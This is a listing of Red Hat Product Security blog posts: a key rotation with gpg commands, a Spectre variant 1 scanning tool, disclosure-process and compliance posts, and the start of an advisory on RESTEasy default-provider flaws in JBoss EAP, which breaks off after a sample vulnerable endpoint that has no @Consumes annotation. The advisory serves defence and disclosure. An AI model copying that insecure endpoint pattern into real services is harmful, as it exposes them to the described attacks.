Latest Posts
-
The Product Security Blog has moved!
Red Hat Product Security has joined forces with other security teams inside Red Hat to publish our content in a common venue using the Security channel of the Red Hat Blog. This move provides a wider variety of important Security topics, from experts all over Red Hat, in a more modern and functional interface. We hope everyone will enjoy the new experience!
Posted: 2019-03-19T19:38:17+00:00 -
New Red Hat Product Security OpenPGP key
Red Hat Product Security has transitioned from using its old 1024-bit DSA OpenPGP key to a new 4096-bit RSA OpenPGP key. This was done to improve the long-term security of our communications with our customers and also to meet current key recommendations from NIST (NIST SP 800-57 Pt. 1 Rev. 4 and NIST SP 800-131A Rev. 1).
The old key will continue to be valid for some time, but it is preferred that all future correspondence use the new key. Replies and new messages either signed or encrypted by Product Security will use this new key.
The old key was:
pub 1024D/0x5E548083650D5882 2001-11-21 Key fingerprint = 92732337E5AD3417526564AB5E548083650D5882
And the new key is:
pub 4096R/0xDCE3823597F5EAC4 2017-10-31 Key fingerprint = 77E79ABE93673533ED09EBE2DCE3823597F5EAC4
To fetch the full key from a public key server, you can simply do:
$ gpg --keyserver keys.fedoraproject.org --recv-key \ '77E79ABE93673533ED09EBE2DCE3823597F5EAC4'
If you already know the old key, you can now verify that the new key is
signed by the old one:$ gpg --check-sigs '77E79ABE93673533ED09EBE2DCE3823597F5EAC4'
You may also import the public key as listed here:
-----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v2.0.22 (GNU/Linux) mQINBFn41kMBEACpJL82mKFBTnr4RyCsEseKhMrKaytD19woOwlGSlwFGFsdLKLw 1jtI2ETqjmIIkZ5uNMB0n9xb1h6azgTZdjADGLRjLcMInxGjw/0wlvhXOlXdea/G Klj0YXikdpgINUiMTb5Pyir7K6YQPI27nVk5KTAx3rCA9js7/Br71F+V++PuPud1 wEJ16SbLitdpOHHGtXj3SdldwHDSPEA5PdgKNZDb4cvj9JXw4IRHgayj9SJ/1us8 7SDkAodjbg6axaKo8LmiRFGgjRydrm47sqi2k7ZlimtsDp2QxWJoZVmyLX3AOcZl e2PxdlzM/h/CGZnzK8WgF54Mtp2xLvn+dn4W9SPJgrLofP07cFrPRi8xtWDAzR1g UqsZbmnla5qJuWP5rCkQzmxrazkzv5mpZ7FnGKsypRV0To6Qr6IPD6k/xU9KiiiN 65WBowoct2Zy6nxStkE3KIBb/98u6vKTUjZ0z4M566rBCpsLabR8gcLY6ObxKYmB N2FR5aif6mdEzfrew2rgxTwcCBh7r8QI7LqgYjmQvXw9aCyHgScu+c0aFtW3p3Ro Ia5Q8F7t9dbZlHVGO1hO8/uiHpA7xOu0Db6XhYrUY7Zqw7QiKBDF6yEjOgwcqpcT zV26C3/GzDx74jK5lp6cRPAaQATFpZRjL/tWubM9XCTLtLF9zU1rzf0uPwARAQAB tDZSZWQgSGF0LCBJbmMuIChQcm9kdWN0IFNlY3VyaXR5KSA8c2VjYWxlcnRAcmVk aGF0LmNvbT6JAjcEEwECACEFAln41kMCGwMGCwkIBwMCBhUIAgkKCwMWAgECHgEC F4AACgkQ3OOCNZf16sSxiw/+I//qjbUaV1rXfg7PDiDA6/SdfSnPoutxk5Gbm//o F/NZaJKh7+EgeDhDsFVnIH70YH6mgCHSVpBDHdLMQ7YvfRdeZeZciCqqnOe76A5o 7mraOEODh/y/W5sa9O3eG9YzEqReahqaFXe3r/JpaZ/C+o5mjqzsfb1WFCv/KC3j Mhgfi7LJ2EpGcGlQ/e42i939SF0KrEG0B89EI+XF6utWJpQX+XSi9RPTq1+YrJnp xhnA93A5C0XZ7H3xW86qguUEYGHuRV6Jfqllh0n3VNKQde5Bik1wHbvrpoGCiO9C Gz9zVT62RoH22cAZhUQ6hyN5itGe51mBuUdfsLeY0BYt9mA6hhZPUWlAynYMqkn1 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 =Yp+7 -----END PGP PUBLIC KEY BLOCK-----
If you are satisfied that you've got the right key, and the UIDs match what you expect, you may import and begin using the new key when communicating with us at secalert@redhat com.
Posted: 2018-08-22T13:30:00+00:00 -
SPECTRE Variant 1 scanning tool
As part of Red Hat's commitment to product security we have developed a tool internally that can be used to scan for variant 1 SPECTRE vulnerabilities. As part of our commitment to the wider user community, we are introducing this tool via this article.
This tool is not a Red Hat product. As such, it is not supported and does not come with any kind of warranty.
The tool only works on static binaries and does not simulate an entire running system. This means it will neither follow jumps through a PLT into a shared library, nor will it emulate the loading of extra code via the dlopen() function.
The tool currently only supports the x86_64 and AArch64 architectures. We do hope to add additional architectures in the future.
The tool is currently available in source form as it would be unwise to offer a security analysis tool as a pre-compiled binary. There are details on how to obtain the source and build the tool later in this article.
Running
To use the scanner simply invoke it with the path to a binary to scan and a starting address inside the binary:
x86_64-scanner vmlinux --start-address=0xffffffff81700001
Note - these examples are using the x86_64 scanner, but the AArch64 scanner behaves in the same way.
The start address will presumably be a syscall entry point, and the binary a kernel image. (Uncompressed; the scanner does not yet know how to decompress compressed kernels). Alternatively the binary could be a library and the address an external function entry point into that library. In fact, the scanner will handle any kind of binary, including user programs, libraries, modules, plugins and so on.
A start address is needed in order to keep things simple and to avoid extraneous output. In theory, the scanner could examine every possible code path through a binary, including ones not normally accessible to an attacker. But this would produce too much output. Instead, a single start address is used in order to restrict the search to a smaller region. Naturally the scanner can be run multiple times with different starting addresses each time, so that all valid points of attack can be scanned.
The output of the scanner will probably look like this:
X86 Scanner: No sequences found.
Or, if something is found, like this:
X86 Scanner: Possible sequence found, based on a starting address of 0:. X86 Scanner: 000000: nop. X86 Scanner: COND: 000001: jne &0xe . X86 Scanner: 00000e: jne &0x24 . X86 Scanner: LOAD: 000010: mov 0xb0(%rdi),%rcx. X86 Scanner: 000017: mov 0xb0(%rsp),%rax. X86 Scanner: 00001f: nop. X86 Scanner: LOAD: 000020: mov 0x30(%rcx),%rbx.
This indicates that entering the test binary at address 0x0 can lead to encountering a conditional jump at address 0x1 would trigger speculation. Then a load at address 0x10 uses an attacker provided value (in %rdi) which might influence a second load at 0x20.
One important point to remember about the scanner’s output is that it is only a starting point for further investigation. Closer examination of the code flagged may reveal that an attacker could not actually use it to exploit the Spectre vulnerability.
Note - currently the scanner does not check that the starting address is actually a valid instruction address. (It does check that the address lies inside the binary image provided). So if an invalid address is provided unexpected errors can be generated.
Note - the scanner sources include two test files, one for x86_64 (x86_64_test.S) and one for AArch64 (aarch64_test.S). These can be used to test the functionality of the scanner.
How It Works
The scanner is basically a simulator that emulates the execution of the instructions from the start address until the code reaches a return instruction which would return to whatever called the start address. It tracks values in registers and memory (including the stack, data sections, and the heap).
Whenever a conditional branch is encountered the scanner splits itself and follows both sides of the branch. This is repeated at every encounter, subject to an upper limit set by the
--max-num-branches
option.The scanner assumes that at the start address only the stack and those registers which are used for parameter passing could contain attacker provided values. This helps prevent false positive results involving registers that could not have been compromised by an attacker.
The scanner keeps a record of the instructions encountered and which of them might trigger speculation and which might be used to load values from restricted memory, so that it can report back when it finds a possible vulnerability.
The scanner also knows about the speculation denial instructions (lfence, pause, csdb), and it will stop a scan whenever it encounters one of them.
The scanner has a built-in limit on the total number of instructions that it will simulate on any given path. This is so that it does not get stuck in infinite loops. Currently the limit is set at 4096 instructions.
Options
The scanner does support a --verbose option which makes it tell you more about what it is doing. If this option is repeated then it will tell even more, possibly too much. The
--quiet
option on the other hand disables most output, (unless there is an internal error), although the tool does still return a zero or non-zero exit value depending upon whether any vulnerabilities were found.There is also a
--max-num-branches
option which will restrict the scanner to following no more than the specified number of conditional branches. The default is 32, so this option can be used to increase or decrease the amount of scanning performed by the tool.By default the scanner assumes that the file being examined is in the ELF file format. But the
--binary
option overrides this and causes the input to be treated as a raw binary file. In this format the address of the first byte in the file is considered to be zero, the second byte is at address 1 and so on.The x86_64 scanner uses Intel syntax in its disassembly output by default but you can change this with the
--syntax=att
option.Building
The source for the scanner is available for download. In order to build the scanner from the source you will also need a copy of the FSF binutils source.
Note - it is not sufficient to just install the binutils package or the binutils-devel package, as the scanner uses header files that are internal to the binutils sources. This requirement is an artifact of how the scanner evolved and it will be removed one day.
Note - you do not need to build a binutils release from these sources. But if you do not then you will need to install the binutils and binutils-devel packages on your system. This is so that the binutils libraries are available for linking the scanner. In theory it should not matter if you have different versions of the binutils sources and binutils packages installed, as the scanner only makes use of very basic functions in the binutils library. Ones that do not change between released versions.
Edit the makefile and select the version of the scanner that you want to build (AArch64 or x86_64). Also edit the CFLAGS variable to point to the binutils sources.
If you are building the AArch64 version of the tool you will also need a copy of the GDB sources from which you will need to build the AArch64 simulator:
./configure --target=aarch64-elf make all-sim
Then edit the makefile and change the AARCH64 variables to point to the built sim. To build the scanner once these edits are complete just run "make".
Feedback
Feedback on problems building or running the scanner are very much welcome. Please send them to Nick Clifton. We hope that you find this tool useful.
Red Hat is also very interested in collaborating with any party that is concerned about this vulnerability. If you would like to pursue this, please contact Jon Masters.
Posted: 2018-07-18T13:30:00+00:00 -
Red Hat’s disclosure process
Last week, a vulnerability (CVE-2018-10892) that affected CRI-O, Buildah, Podman, and Docker was made public before some affected upstream projects were notified. We regret that this was not handled in a way that lives up to our own standards around responsible disclosure. It has caused us to look back to see what went wrong so as to prevent this from happening in the future.
Because of how important our relationships with the community and industry partners are and how seriously we treat non-public information irrespective of where it originates, we are taking this event as an opportunity to look internally at improvements and challenge assumptions we have held.
We conducted a review and are using this to develop training around the handling of non-public information relating to security vulnerabilities, and ensuring that our relevant associates have a full understanding of the importance of engaging with upstreams as per their, and our, responsible disclosure guidelines. We are also clarifying communication mechanisms so that our associates are aware of the importance of and methods for notifying upstream of a vulnerability prior to public disclosure.
Red Hat values and recognizes the importance of relationships, be they with upstreams, downstreams, industry partners and peers, customers, or vulnerability reporters. We embrace open source development principles including trust and transparency. As we navigate through a landscape full of software that will inevitably contain security vulnerabilities we strive to manage each flaw with the same degree of care and attention, regardless of its potential impact. Our commitment is to work with other vendors of Linux and open source software to reduce the risk of security issues through responsible information sharing and peer reviews.
This event has reminded us that it is important to remain vigilant, provide consistent, clear guidance, and handle potentially sensitive information appropriately. And while our track record of responsible disclosure speaks for itself, when an opportunity presents itself to revisit, reflect, and improve our processes, we make the most of it to ensure we have the proper procedures and controls in place.
Red Hat takes its participation in open source projects and security disclosure very seriously. We have discovered hundreds of vulnerabilities and our dedicated Product Security team has participated in responsible disclosures for more than 15 years. We strive to get it right every time, but this time we didn't quite live up to the standards to which we seek to hold ourselves. Because we believe in open source principles such as accountability, we wanted to share what had happened and how we have responded to it. We are sincerely apologetic for not meeting our own standards in this instance.
Posted: 2018-07-10T13:00:00+00:00 -
Join us in San Francisco at the 2018 Red Hat Summit
This year’s Red Hat Summit will be held on May 8-10 in beautiful San Francisco, USA. Product Security will be joining many Red Hat security experts in presenting and assisting subscribers and partners at the show. Here is a sneak peek at the more than 125 sessions that a security-minded attendee can see at Summit this year.
Sessions
Cloud Management and Automation
S1181 - Automating security and compliance for hybrid environments
S1467 - Live demonstration: Find it. Fix it. Before it breaks.
S1104 - Distributed API Management in a Hybrid Cloud EnvironmentContainers and Openshift
S1049 - Best practices for securing the container life cycle
S1260 - Hitachi & Red Hat collaborate: container migration guide
S1220 - Network Security for Apps on OpenShift
S1225 - OpenShift for Operations
S1778 - Security oriented OpenShift within regulated environments
S1689 - Automating Openshift Secure Container Deployment at ExperianInfrastructure Modernization & Optimization
S1727 - Demystifying systemd
S1741 - Deploying SELinux successfully in production environments
S1329 - Operations Risk Remediation in Highly Secure Infrastructures
S1515 - Path to success with your Identity Management deployment
S1936 - Red Hat Satellite 6 power user tips and tricks
S1907 - Satellite 6 Securing Linux lifecycle in the Public Sector
S1931 - Security Enhanced Linux for Mere Mortals
S1288 - Smarter Infrastructure Management with Satellite & InsightsMiddleware + Modern App Dev Security
S1896 - Red Hat API Management Overview, Security Models and Roadmap
S1863 - Red Hat Single Sign-On Present and Future
S1045 - Securing Apps & Services with Red Hat Single-Sign On
S2109 - Securing service mesh, micro services and modern applications with JWT
S1189 - Mobile in a containers worldValue of the Red Hat Subscription
S1916 - Exploiting Modern Microarchitectures: Meltdown, Spectre, and other hardware security vulnerabilities in modern processors
S2702 - The Value of a Red Hat SubscriptionRoadmaps & From the Office of the CTO
S2502 - Charting new territories with Red Hat
S9973 - Getting strategic about security
S1017 - Red Hat Security Roadmap : It's a Lifestyle, Not a Product
S1000 - Red Hat Security Roadmap for Hybrid Cloud
S1890 - What's new in security for Red Hat OpenStack Platform?Instructor-Led Security Labs
L1007, L1007R - A practical introduction to container security (3rd ed.)
L1036 - Defend Yourself Using Built-in RHEL Security Technologies
L1034, L1034R - Implementing Proactive Security and Compliance Automation
L1051 - Linux Container Internals: Part 1
L1052 - Linux Container Internals: Part 2
L1019 - OpenShift + RHSSO = happy security teams and happy users
L1106, L1106R - Practical OpenSCAP
L1055 - Up and Running with Red Hat Identity ManagementSecurity Mini-Topic Sessions
M1022 - A problem's not a problem, until it's a problem (Red Hat Insights)
M1140 - Blockchain: How to identify good use cases
M1087 - Monitor and automate infrastructure risk in 15 minutes or lessSecurity Birds-of-a-Feather Sessions
B1009 - Connecting the Power of Data Security and Privacy
B1990 - Grafeas to gate your deployment pipeline
B1046 - I'm a developer. What do I need to know about security?
B1048 - Provenance and Deployment Policy
B1062 - The Red Hat Security BoF - Ask us (most) anything
B1036 - Virtualization: a study
B2112 - Shift security left - and right - in the container lifecycleSecurity Panels
P1757 - DevSecOps with disconnected OpenShift
P1041 - Making IoT real across industriesSecurity Workshops
W1025 - Satellite and Insights Test-drive
On top of the sessions, Red Hat Product Security will be there playing fun educational games like our Flawed and Branded card game and the famous GAME SHOW! GAME SHOW!
No matter what your interest or specialty is, Red Hat Summit definitely has something for you. Come learn more about the security features and practices around our products! We're looking forward to seeing you there!
Posted: 2018-04-23T14:30:00+00:00 -
Certificate Transparency and HTTPS
Google has announced that on April 30, 2018, Chrome will:
“...require that all TLS server certificates issued after 30 April, 2018 be compliant with the Chromium CT Policy. After this date, when Chrome connects to a site serving a publicly-trusted certificate that is not compliant with the Chromium CT Policy, users will begin seeing a full page interstitial indicating their connection is not CT-compliant. Sub-resources served over https connections that are not CT-compliant will fail to load and will show an error in Chrome DevTools.”
So what exactly does this mean, and why should one care?
What is a CT policy?
CT stands for “Certificate Transparency” and, in simple terms, means that all certificates for websites will need to be registered by the issuing Certificate Authority (CA) in at least two public Certificate Logs.
When a CA issues a certificate, it now must make a public statement in a trusted database (the Certificate Log) that, at a certain date and time, they issued a certificate for some site. The reason is for more than a year many different CAs have issued certificates for sites and names for which they shouldn’t (like “localhost” or “1.2.3.”) or have issued certificates following fraudulent requests (e.g. people who are not BigBank asking for certificates for bigbank.example.com). By placing all requested certificates into these Certificate Logs, other groups, such as security researchers and companies, can monitor what is being issued and raise red flags as needed (e.g. if you see a certificate issued for your domain, which you did not request).
If you do not announce your certificates in these Certificate Logs, the Chrome web browser will generate an error page that the user must click through before going to the page they were trying to load, and if a page contains elements (e.g. from advertising networks) that are served from non CT-compliant domains, they will simply not be loaded.
Why is Google doing this?
Well there are probably several reasons but the main ones are:
-
As noted, several CAs have been discovered issuing certificates wrongly or fraudulently, putting Internet users at risk. This technical solution will greatly reduce the risk as such wrong or fraudulently issued certificates can be detected quickly.
-
More importantly, this prepares for a major change coming to the Chrome web browser in July 2018, in which all HTTP websites will be labeled as “INSECURE”, which should significantly drive up the adoption of HTTPS. This adoption will, of course, result in a flood of new certificates which, combined with the oversight provided by Certificate Logs, should help to catch fraudulently or wrongly-obtained certificates.
What should a web server operator do?
The first step is to identify your web properties, both external facing and internal facing. Then it’s simply a matter of determining whether you:
want the certificate for a website to show up in the Certificate Log so that the Chrome web browser does not generate an error (e.g. your public facing web sites will want this), or absolutely do not want that particular certificate to show up in the Certificate Logs (e.g. a sensitive internal host), and you’re willing to live with Chrome errors.
Depending on how your certificates are issued, and who issued them, you may have some time before this becomes an issue (e.g. if you are using a service that issues short lived certificates you definitely will be affected by this). Also please note that some certificate issuers like Amazon’s AWS Certificate Manager do allow you to choose to opt out of reporting them to the Certificate Logs, a useful feature for certificates being used on systems that are “internal” and you do not want the world to know about.
It should be noted that in the long term, option 2 (not reporting certificates to the Certificate Logs) will become increasingly problematic as it is possible that Google may simply have Chrome block them rather than generate an error. So, with that in mind, now is probably a good time to start determining how your security posture will change when all your HTTPS-based hosts are effectively being enumerated publicly. You will also need to determine what to do with any HTTP web sites, as they will start being labelled as “INSECURE” within the next few months, and you may need to deploy HTTPS for them, again resulting in them potentially showing up in the Certificate Logs.
Posted: 2018-04-17T15:00:01+00:00 -
-
Let's talk about PCI-DSS
For those who aren’t familiar with Payment Card Industry Data Security Standard (PCI-DSS), it is the standard that is intended to protect our credit card data as it flows between systems and is stored in company databases. PCI-DSS requires that all vulnerabilities rated equal to, or higher than, CVSS 4.0 must be addressed by PCI-DSS compliant organizations (notably, those which process and/or store cardholder data). While this was done with the best of intentions, it has had an impact on many organizations' capability to remediate these vulnerabilities in their environment.
The qualitative severity ratings of vulnerabilities as categorized by Red Hat Product Security do not directly align with the baseline ratings recommended by CVSS. These CVSS scores and ratings are used by PCI-DSS and most scanning tools. As a result, there may be cases where a vulnerability which would be rated as low severity by Red Hat, may exceed the CVSS’ recommended threshold for PCI-DSS.
Red Hat has published guidelines on vulnerability classification. Red Hat Product Security prioritizes focus of security flaw remediation on Critical and Important vulnerabilities, which provide compromise to confidentiality, data, and/or availability. This is not intended to downplay the importance of lower severity vulnerabilities, but rather, aims to target those risks which are seen as most important by our customers and industry at large. CVSS ratings for vulnerabilities build upon a set of assumptions, factoring in a worst-case scenario (i.e. the CVSS calculator leaves all Temporal and Environmental factors set to “undefined”) possibly resulting in an environment that has no security mitigations or blocking controls in place, which might not be an accurate representation of your environment. Specifically, a given flaw may be less significant in your application depending how the function is used, whether it is exposed to untrusted data, or whether it enforces a privilege boundary. It is Red Hat’s position, that the base CVSS scores alone cannot reliably be used to fully capture the importance of flaws in every use case.
In most cases, security issues will be addressed when updates are available upstream. However, as noted above, there may be cases where a vulnerability rated as low severity by Red Hat, may exceed the CVSS’ threshold for vulnerability mitigation by the PCI-DSS standard and be considered actionable by a security scanner or during an audit by a Qualified Scanning Auditor (QSA).
In light of the above, Red Hat does not claim any of its products meet PCI-DSS compliance requirements. We do strive to provide secure software solutions and guidance to help remediate vulnerabilities of notable importance to our customers.
When there is a discrepancy in the security flaw ratings, we suggest the following:
-
Harden your system: Determine if the component is needed or used. In many cases, scans will pick up on packages which are included in the distribution but do not need to be deployed in the production environment. If customers can remove these packages, or replace with another unaffected package, without impacting their functional system, they reduce the attack surface and reduce the number of components which might be targeted.
-
Validate the application: Determine if the situation is a false positive. (Red Hat often backports fixes which may result in false positives for version-detecting scanning products).
-
Self-evaluate the severity: Update the base CVSS score by calculating the environmental factors that are relevant, document the updated CVSS score for the vulnerability respective to your environment. All CVSS vector strings in our CVE pages link to the CVSS calculator on FIRST's website, with the base score pre-populated so that customers just need to fill in their other metrics.
-
Implement other controls to limit (or eliminate) exposure of the vulnerable interface or system.
Further technical information to make these determinations can often be found from product support, in the various technical articles and blogs Red Hat makes available, in CVE pages’ Statement or Mitigation sections and in Bugzilla tickets. Customers with support agreements can reach out to product support for additional assistance to evaluate the potential risk for their environment, and confirm if the vulnerability jeopardizes the confidentiality of PCI-DSS data.
Red Hat recognizes vulnerability scores and impacts may differ, and are there to help you assess your environment. As a customer, you can open a support case and provide us the feedback that matters to you. Our support and product teams value this feedback and will use it to provide better results.
Posted: 2018-02-28T14:30:00+00:00 -
-
Security is from Mars, Developers are from Venus…...or ARE they?
It is a tale as old as time. Developers and security personnel view each other with suspicion. The perception is that a vast gulf of understanding and ability lies between the two camps. “They can’t possibly understand what it is to do my job!” is a surprisingly common statement tossed about. Both groups blame the other for being the source of all of their ills. It has been well-known that fixing security bugs early in the development lifecycle not only helps eliminate exposure to potential vulnerabilities, but it also saves time, effort, and money. Once a defect escapes into production it can be very costly to remediate.
Years of siloing and specialization have driven deep wedges between these two critical groups. Both teams have the same goal: to enable the business. They just take slightly different paths to get there and have different expertise and focus. In the last few decades we’ve all been forced to work more closely together, with movements like Agile reminding everyone that we’re all ultimately there to serve the business and the best interest of our customers. Today, with the overwhelming drive to move to a DevOps model, to get features and functionality out into the hands of our customers faster, we must work better together to make the whole organization succeed.
Through this DevOps shift in mindset (Development and Operations working more closely on building, deploying, and maintaining software), both groups have influenced each other’s thinking. Security has started to embrace the benefits of things like iterative releases and continuous deployments, while our coder-counterparts have expanded their test-driven development methods to include more automation of security test cases and have become more mindful of things like the OWASP Top 10 (the Open Web Application Security Project). We are truly on the brink of a DevSecOps arena where we can have fruitful collaboration from the groups that are behind the engine that drives our respective companies. Those that can embrace this exciting new world are poised to reap the benefits.
Red Hat Product Security is pleased to partner with our friends over in the Red Hat Developer Program. Our peers there are driving innovation in the open source development communities and bringing open source to a new generation of software engineers. It is breathtaking to see the collaboration and ideas that are emerging in this space. We’re also equally pleased that security is not just an afterthought for them. Developing and composing software that considers “security by design” from the earliest stages of the development lifecycle helps projects move faster while delivering innovative and secure solutions. They have recently kicked-off a new site topic that focuses on secure programing and we expect it to be a great resource within the development community: Secure Programming at the Red Hat Developer Program.
In this dedicated space of our developer portal you’ll find a wealth of resources to help coders code with security in mind. You’ll find blogs from noted luminaries. You’ll find defensive coding guides, and other technical materials that will explain how to avoid common coding flaws that could develop into future software vulnerabilities. You’ll also be able to directly engage with Red Hat Developers and other open source communities. This is a great time to establish that partnership and “reach across the aisle” to each other. So whether you are interested in being a better software engineer and writing more secure code, or are looking to advocate for these techniques, Red Hat has a fantastic set of resources to help guide you toward a more secure future!
Posted: 2017-11-16T15:00:00+00:00 -
Abuse of RESTEasy Default Providers in JBoss EAP
Red Hat JBoss Enterprise Application Platform (EAP) is a commonly used host for Restful webservices. A powerful but potentially dangerous feature of Restful webservices on JBoss EAP is the ability to accept any media type. If not configured to accept only a specific media type, JBoss EAP will dynamically process the request with the default provider matching the
Content-Type
HTTP Header which the client specifies. Some of the default providers where found to have vulnerabilities which have now been removed from JBoss EAP and it's upstream Restful webservice project, RESTEasy.The attack vector
There are two important vulnerabilities fixed in the RESTEasy project in 2016 which utilized default providers as an attack vector. CVE-2016-7050 was fixed in version 3.0.15.Final, while CVE-2016-9606 was fixed in version 3.0.22.Final. Both vulnerabilities took advantage of the default providers available in RESTEasy. They relied on a webservice endpoint doing the following:
- @Consumes annotation was present specifying wildcard mediaType
{*/*}
- @Consumes annotation was not present on webservice endpoint
- Webservice endpoint consumes a multipart mediaType
Here's an example of what a vulnerable webservice would look like:
import java.util.*; import javax.ws.rs.*; import javax.ws.rs.core.*; @Path("/") public class PoC_resource { @POST @Path("/concat") public Map<String, String> doConcat(Pair pair) { HashMap<String, String> result = new HashMap<String, String>(); result.put("Result", pair.getP1() + pair.getP2()); return result; } }
Notice how there is no @Consumes annotation on the doConcat method.
The vulnerabilities
